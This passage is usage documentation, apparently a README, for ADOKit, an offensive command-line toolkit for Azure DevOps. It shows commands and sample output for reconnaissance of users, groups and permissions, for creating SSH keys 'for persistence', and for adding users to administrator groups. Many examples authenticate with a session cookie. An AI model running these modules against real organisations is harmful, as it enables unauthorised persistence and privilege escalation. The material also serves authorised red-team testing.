-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.

Syntax

Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PATs for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:04:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, valid-until date, and the last 20 characters of the public SSH key for the key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The SSH key will be valid until 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 2:51:22 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.

Syntax

Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and valid-until date for all active SSH keys for the user. Additionally, it will print the last 20 characters of each public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:37:10 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.

Syntax

Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether the SSH key was removed or not, and then will list the current active SSH keys for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 1:50:08 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance

Syntax

Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:07 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in an Azure DevOps instance

Syntax

Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:23 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance

Syntax

Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of each group.

ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


---SNIP---

4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in an Azure DevOps instance

Syntax

Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each matching group.

ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:41 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group

Syntax

Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the member's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:03 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.

Syntax

Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


[*] INFO: Listing group members for each group that has permissions to this project



GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.

Syntax

Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 2:52:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.

Syntax

Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:19:43 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.

Syntax

Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:41:51 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.

Syntax

Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:42:10 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.

Syntax

Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:04:40 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.

Syntax

Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:10:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.

Syntax

Provide the addcollectionbuildadmin module along with the /user: argument specifying the user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:39 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.

Syntax

Provide the removecollectionbuildadmin module along with the /user: argument specifying the user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.

Syntax

Provide the addcollectionbuildsvc module along with the /user: argument specifying the user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:13 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.

Syntax

Provide the removecollectionbuildsvc module along with the /user: argument specifying the user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:27 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.

Syntax

Provide the addcollectionsvc module along with the /user: argument specifying the user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:01 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.

Syntax

Provide the removecollectionsvc module along with the /user: argument specifying the user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:43 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
